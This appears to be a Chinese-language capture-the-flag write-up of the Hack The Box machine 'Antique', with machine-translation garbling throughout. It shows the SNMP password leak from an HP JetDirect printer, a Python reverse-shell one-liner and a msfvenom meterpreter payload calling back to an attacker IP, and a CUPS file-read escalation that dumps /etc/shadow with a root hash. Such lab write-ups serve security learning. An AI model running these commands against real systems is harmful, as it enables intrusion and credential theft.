免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。

服务探测

┌──(rootkali)-[~/htb/Antique]└─# nmap -sV -Pn 10.10.11.107Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 ESTNmap scan report for 10.10.11.107Host is up (0.39s latency).Not shown: 999 closed portsPORT   STATE SERVICE VERSION23/tcp open  telnet?1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NULSF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPaSF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetReSF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\xSF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nPSF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatusSF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nPSF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPasswordSF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(KerbSF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswoSF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDirSF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalSSF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDirSF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirecSF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20JetSF:Direct\n\nPassword:\x20");Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds

23端口开了一个telnet服务，nc连上去看看

┌──(rootkali)-[~/htb/Antique]└─# nc 10.10.11.107 23             HP JetDirectlsPassword: 123456Invalid password

问候语是HP JetDirect,查了一下是惠普的打印机

须要一个明码能力登陆telnet，然而不须要账号

依据HP JetDirect telnet作为关键字在谷歌上找到这篇文章

利用Getting a JetDirect password remotely using the SNMP vulnerability的办法，咱们输出以下信息

──(rootkali)-[~/htb/Antique]└─# snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0Created directory: /var/lib/snmp/cert_indexesiso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 

把下面的数字拿到这个hex2text网站,解得明码是：P@ssw0rd@123!!123

用下面的凭证登陆telnet账号

┌──(rootkali)-[~/htb/Antique]└─# nc 10.10.11.107 23HP JetDirectPassword: P@ssw0rd@123!!123Please type "?" for HELP> ?To Change/Configure Parameters Enter:Parameter-name: value <Carriage Return>Parameter-name Type of valueip: IP-address in dotted notationsubnet-mask: address in dotted notation (enter 0 for default)default-gw: address in dotted notation (enter 0 for default)syslog-svr: address in dotted notation (enter 0 for default)idle-timeout: seconds in integersset-cmnty-name: alpha-numeric string (32 chars max)host-name: alpha-numeric string (upper case only, 32 chars max)dhcp-config: 0 to disable, 1 to enableallow: <ip> [mask] (0 to clear, list to display, 10 max)addrawport: <TCP port num> (<TCP port num> 3000-9000)deleterawport: <TCP port num>listrawport: (No parameter required)exec: execute system commands (exec id)exit: quit from telnet session> exec iduid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)> exec whoamilp/var/spool/lpd> exec find / -name user.txt/home/lp/user.txt/var/spool/lpd/user.txt

提权

查看零碎相干信息

> exec uname -aLinux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux> exec python3 --versionPython 3.8.10

发现装置了python3，用上面命令反弹一个趁手的shell

exec python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

┌──(rootkali)-[~/htb/Antique]└─# nc -lnvp 4242                                                                                                                                                                                                                            1 ⨯listening on [any] 4242 ...connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100$ ididuid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)$ 

咱们发现lpadmin这个用户组比拟可疑，可能能够用于提权，通过谷歌当前，我找到了这篇文章

外面提到：

members of lpadmin can read every file on server via cups

这个用户组的人能够读取零碎外面的任意文件，于是持续搜寻提权脚本，最初发现一个msf的模块multi/escalate/cups_root_file_read能够用于提权

咱们先编译一个msf的反弹shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f elf > shell.elf

传到靶机，触发，拿到msf，执行提权脚本

msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.10.14.15:4444 [*] Sending stage (980808 bytes) to 10.10.11.107[*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50 -0500meterpreter > run multi/escalate/cups_root_file_read[!] SESSION may not be compatible with this module.[+] User in lpadmin group, continuing...[+] cupsctl binary found in $PATH[+] nc binary found in $PATH[*] Found CUPS 1.6.1[+] File /etc/shadow (998 bytes) saved to /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin[*] Cleaning up...meterpreter > getuid

查看/etc/shadow文件

┌──(rootkali)-[~/htb/Antique]└─# cat /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.binroot:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::daemon:*:18375:0:99999:7:::bin:*:18375:0:99999:7:::sys:*:18375:0:99999:7:::sync:*:18375:0:99999:7:::games:*:18375:0:99999:7:::man:*:18375:0:99999:7:::lp:*:18375:0:99999:7:::mail:*:18375:0:99999:7:::news:*:18375:0:99999:7:::uucp:*:18375:0:99999:7:::proxy:*:18375:0:99999:7:::www-data:*:18375:0:99999:7:::backup:*:18375:0:99999:7:::list:*:18375:0:99999:7:::irc:*:18375:0:99999:7:::gnats:*:18375:0:99999:7:::nobody:*:18375:0:99999:7:::systemd-network:*:18375:0:99999:7:::systemd-resolve:*:18375:0:99999:7:::systemd-timesync:*:18375:0:99999:7:::messagebus:*:18375:0:99999:7:::syslog:*:18375:0:99999:7:::_apt:*:18375:0:99999:7:::tss:*:18375:0:99999:7:::uuidd:*:18375:0:99999:7:::tcpdump:*:18375:0:99999:7:::landscape:*:18375:0:99999:7:::pollinate:*:18375:0:99999:7:::systemd-coredump:!!:18389::::::lxd:!:18389::::::usbmux:*:18891:0:99999:7:::  

编辑成john能够读取的格局

┌──(rootkali)-[~/htb/Antique]└─# cat shadow.txt root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::                                                                                                                                                                                                                      ┌──(rootkali)-[~/htb/Antique]└─# unshadow passwd.txt shadow.txt > unshadowed.txt                                                                                                                                                                                                                      ┌──(rootkali)-[~/htb/Antique]└─# cat unshadowed.txt root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root:/root:/bin/bash

然而我没方法爆破出这个明码

于是转换思路，root下会不会有id_rsa文件
编辑msf模块

msf6 > use multi/escalate/cups_root_file_readmsf6 post(multi/escalate/cups_root_file_read) > edit

把46行改成/root/.ssh/id_rsa

编辑保留

下载到本地

meterpreter > run multi/escalate/cups_root_file_read[!] SESSION may not be compatible with this module.[+] User in lpadmin group, continuing...[+] cupsctl binary found in $PATH[+] nc binary found in $PATH[*] Found CUPS 1.6.1[+] File /root/.ssh/id_rsa (341 bytes) saved to /root/.msf4/loot/20211130120322_default_10.10.11.107_cups_file_read_145418.bin[*] Cleaning up...

然而没有这个文件：

┌──(rootkali)-[~]└─# cat /root/.msf4/loot/20211130120601_default_10.10.11.107_cups_file_read_604992.bin<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD>        <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">        <TITLE>Not Found - CUPS v1.6.1</TITLE>        <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css"></HEAD><BODY><H1>Not Found</H1><P></P></BODY></HTML>   

最初只好把/root/root.txt下载到本地，弄完曾经凌晨一点多，算是完结这次浸透

meterpreter > run multi/escalate/cups_root_file_read[!] SESSION may not be compatible with this module.[+] User in lpadmin group, continuing...[+] cupsctl binary found in $PATH[+] nc binary found in $PATH[*] Found CUPS 1.6.1[+] File /root/root.txt (32 bytes) saved to /root/.msf4/loot/20211130120724_default_10.10.11.107_cups_file_read_556098.txt[*] Cleaning up...